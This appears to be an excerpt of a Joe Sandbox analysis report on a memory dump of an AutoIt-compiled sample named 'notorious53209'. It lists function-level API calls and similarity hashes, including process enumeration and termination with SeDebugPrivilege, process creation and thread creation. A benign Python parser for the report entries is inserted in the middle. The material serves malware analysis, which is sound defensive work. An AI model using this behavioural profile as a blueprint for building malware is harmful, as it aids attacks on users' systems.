                                                  • Instruction ID: 32c6afa0f4624543f6cca9aeb3244529d7dd34ad4364af434543392857c2c867
                                                  • Opcode Fuzzy Hash: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                                                  • Instruction Fuzzy Hash: D3318CB5829309EFDB10CFA4DC88AC9BFF4FB0A310F10416AE550E62A0D3B50645DF52
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                  • RegisterClassExW.USER32(00000030), ref: 0088309E
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                  • LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 975902462-1005189915
                                                  • Opcode ID: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                                                  • Instruction ID: 1bf6c01e04f4d9c48b7130295c086bca98e4126d89ae04665af2e3afb1ed064a
                                                  • Opcode Fuzzy Hash: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                                                  • Instruction Fuzzy Hash: 7B21C7B5925318AFDB10DFA4EC59B9DBBF4FB0A704F00412AF510E62A0D7B14644AF92
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F903D
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F9071
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F91EB
                                                  • SysFreeString.OLEAUT32(?), ref: 008F9215
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                                                  • Instruction ID: 8cbbaeb880b6fdb66c3eb4c0ccf15aa064a5e2d58c154b1c9bfa6809ee1f9915
                                                  • Opcode Fuzzy Hash: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                                                  • Instruction Fuzzy Hash: A2F10671A00119EFDB14DFA8C888EBEB7B9FF89314F108059EA55EB251DB31AE45CB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 008FF9C9
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB5C
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB80
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBC0
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBE2
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFD5E
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFD90
                                                  • CloseHandle.KERNEL32(?), ref: 008FFDBF
                                                  • CloseHandle.KERNEL32(?), ref: 008FFE36
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 341478a953f634f2ce490ae2ea2e1ac5730edf58acfaeef499bec69219c6ba35
                                                  • Instruction ID: 4ff2c17ddddbda30a89cc207b64f6e8433998181c0376017c1d15e653009a2eb
                                                  • Opcode Fuzzy Hash: 341478a953f634f2ce490ae2ea2e1ac5730edf58acfaeef499bec69219c6ba35
                                                  • Instruction Fuzzy Hash: 07E191312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB31DC41CB52
                                                  APIs
                                                    • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00881B9A
                                                  • DestroyWindow.USER32(?), ref: 008820D3
                                                  • KillTimer.USER32(-00000001,?), ref: 0088216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 008BBEF6
                                                  • DeleteObject.GDI32(00000000), ref: 008BBF6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 2402799130-0
                                                  • Opcode ID: b52a183389c8f847a54334eabaadd7eb13da1f11c43c6e34b7336ab90e98137d
                                                  • Instruction ID: afe006d647895f69efd38dffc80e90cfd8e355a48d2473512912d1e836efb073
                                                  • Opcode Fuzzy Hash: b52a183389c8f847a54334eabaadd7eb13da1f11c43c6e34b7336ab90e98137d
                                                  • Instruction Fuzzy Hash: 55619B79128B14DFDB35AF18DD48B69B7F1FF42316F108528E042D6A60CB71A981EF92
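The function entries on this page (the APIs, Memory Dump Source and Similarity blocks) are easier to compare against other reports once they are structured, and they also show a property worth checking by code rather than by eye: the two RegisterClassExW entries share API String ID 975902462-1005189915 but carry different Opcode IDs and Instruction Fuzzy Hashes, so they are two functions built from the same calls and strings, not one function listed twice. The following Python parser is an added example and not part of the Joe Sandbox report; its regular expressions and the key names in the returned dicts are this example's own choices, not a Joe Sandbox export format. SAMPLE is an excerpt of three entries copied from this page, with the "Download File" link residue left on the Associated lines on purpose so the parser has to strip it.

```python
"""Parse Joe Sandbox function entries ('APIs' / 'Memory Dump Source' /
'Similarity' blocks) into dicts and cluster them by API String ID.
Added example; the field names and regexes are this script's own choices."""
import re
from collections import Counter, defaultdict

# One API-call line, in the three shapes that occur in the report:
#   • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E172A
#   • GetForegroundWindow.USER32 ref: 008E1714
#   • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # link label the HTML export leaves on dump names


def parse_entries(text):
    """Return one dict per function entry; an entry starts at an 'APIs' line."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "associated": []}
            entries.append(cur)
        if line in SECTIONS:
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                cur["apis"].append({
                    "api": m.group("api"), "module": m.group("mod"),
                    "args": args.split(",") if args else [],
                    "ref": int(m.group("ref"), 16),
                    "subcall": int(m.group("sub"), 16) if m.group("sub") else None})
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m.group("key"), m.group("val")
        if val.endswith(RESIDUE):            # strip the page residue
            val = val[:-len(RESIDUE)]
        if key == "Associated":
            cur["associated"].append(val)
        elif key == "Source File":           # drop ', Offset: ..., based on PE: ...'
            cur["source_file"] = val.split(",", 1)[0]
        else:                                # API ID, String ID, Opcode ID, ...
            cur[key.lower().replace(" ", "_")] = val
    return entries


def cluster_by_api_string_id(entries):
    """Opcode IDs grouped by 'API String ID' (API-set key + string-set key).
    Members with different Instruction Fuzzy Hashes are distinct functions
    that happen to make the same calls with the same strings."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.get("api_string_id")].append(e.get("opcode_id"))
    return dict(groups)


def api_histogram(entries):
    """How often each MODULE!Api occurs across all entries, subcalls included."""
    return Counter(f"{a['module']}!{a['api']}" for e in entries for a in e["apis"])


# Excerpt of three entries copied from this report; two share an API String ID.
SAMPLE = """
APIs
• GetForegroundWindow.USER32 ref: 008E1714
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E172A
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
APIs
• RegisterClassExW.USER32(00000030), ref: 0088309E
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
Strings
Similarity
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 975902462-1005189915
• Opcode ID: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
APIs
• RegisterClassExW.USER32(00000030), ref: 0088309E
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
Similarity
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 975902462-1005189915
• Opcode ID: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
"""

if __name__ == "__main__":
    for key, members in cluster_by_api_string_id(parse_entries(SAMPLE)).items():
        print(key, [m[:12] for m in members])
```

Feed it the whole report text and `cluster_by_api_string_id` returns every group of functions that Joe Sandbox considers call-and-string identical; diff the Instruction Fuzzy Hashes within a group (or against a known-good AutoIt runtime) to tell stub-level duplicates from genuinely different code, and use `api_histogram` to see at a glance which imports dominate a dump.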
                                                  APIs
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                                    • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 008E4FE2
                                                  • _wcscmp.LIBCMT ref: 008E4FFC
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E5017
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 98dcf285e9c065011986a381ba4ea6ac82b4082b83d4f75b27470a9f6d657db9
                                                  • Instruction ID: b70286abeb82c2f988032d0a940e83a18681869320ee9efb10f77980f00c2a23
                                                  • Opcode Fuzzy Hash: 98dcf285e9c065011986a381ba4ea6ac82b4082b83d4f75b27470a9f6d657db9
                                                  • Instruction Fuzzy Hash: EF5141B20087859BD624EB54C8919DFB3ECFF85344F10092EB689D3152EE74E6888767
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090896E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 4386ceddd5e81128c95751ab3a88b5b4eeb26952ed6f4bc9a2758e2bdec0ca8d
                                                  • Instruction ID: 8928c0afb93bae5b76a8562079e8a31a41083fdd21fe686bfbf86b8c8d97f160
                                                  • Opcode Fuzzy Hash: 4386ceddd5e81128c95751ab3a88b5b4eeb26952ed6f4bc9a2758e2bdec0ca8d
                                                  • Instruction Fuzzy Hash: C9517230704208BFDF309F28CC85BAB7B69FB15320F604516F9A5E69E1DF75A9809B91
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC547
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC569
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC581
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC59F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC5C0
                                                  • DestroyCursor.USER32(00000000), ref: 008BC5CF
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC5EC
                                                  • DestroyCursor.USER32(?), ref: 008BC5FB
                                                    • Part of subcall function 0090A71E: DeleteObject.GDI32(00000000), ref: 0090A757
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2975913752-0
                                                  • Opcode ID: 2e2fe8737ca0bf69b82b647bf92e5fa5d76eadce855af2bdce3b99dc37893d76
                                                  • Instruction ID: 85cdd4dfc8ccca560d753cf088310990478c0f0626a55106aefad21f162d9b04
                                                  • Opcode Fuzzy Hash: 2e2fe8737ca0bf69b82b647bf92e5fa5d76eadce855af2bdce3b99dc37893d76
                                                  • Instruction Fuzzy Hash: E8514874A10209EFDB20EF24CC45FAA7BA5FB55724F104528F902D76A0DB70ED90EB51
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E0C
                                                  • RtlAllocateHeap.NTDLL(00000000,?,008D8A84), ref: 008D8E13
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E28
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E30
                                                  • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E33
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E43
                                                  • GetCurrentProcess.KERNEL32(008D8A84,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4B
                                                  • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4E
                                                  • CreateThread.KERNEL32(00000000,00000000,008D8E74,00000000,00000000,00000000), ref: 008D8E68
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                  • String ID:
                                                  • API String ID: 1422014791-0
                                                  • Opcode ID: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                                                  • Instruction ID: 2a920765a0cb2ed228923aef83d78f23ee01ace7803b67c198981bb87230ede4
                                                  • Opcode Fuzzy Hash: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                                                  • Instruction Fuzzy Hash: 8201BF75254304FFE760EB65DC4DF573B6CEB89B11F004521FA05DB691CA749900DB20
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                                                  • Instruction ID: 6f187a0ecc6c77e76b16e5f918243748bb28414a901a88e814902b765fb533e6
                                                  • Opcode Fuzzy Hash: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                                                  • Instruction Fuzzy Hash: 0991BC70A00219ABDF24DFA5C848FAEBBB8FF99714F108159F645EB290D7749941CFA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00907093
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 009070A7
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009070C1
                                                  • _wcscat.LIBCMT ref: 0090711C
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00907133
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00907161
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                                                  • Instruction ID: 47ecaec8856fb12bab78f5a25f61a613ab12aa9a4e0bdf2c0e72061c08e2142a
                                                  • Opcode Fuzzy Hash: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                                                  • Instruction Fuzzy Hash: 95419171904308AFEB219FA4CC85BEEB7BCEF48364F10052AF544E71D1D672AD859B60
                                                  APIs
                                                    • Part of subcall function 008E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3EB6
                                                    • Part of subcall function 008E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 008E3EC4
                                                    • Part of subcall function 008E3E91: CloseHandle.KERNEL32(00000000), ref: 008E3F8E
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECB8
                                                  • GetLastError.KERNEL32 ref: 008FECCB
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECFA
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FED77
                                                  • GetLastError.KERNEL32(00000000), ref: 008FED82
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FEDB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                                                  • Instruction ID: b42b4b09e8a46844c7e6ff439df55b65ae39def953f5a2b1c550fafb21fa66e9
                                                  • Opcode Fuzzy Hash: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                                                  • Instruction Fuzzy Hash: E9418A712042159FDB24EF28C8A5F7DB7A1FF80714F088059FA82DB2D2DB75A904CB92
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 008E32C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
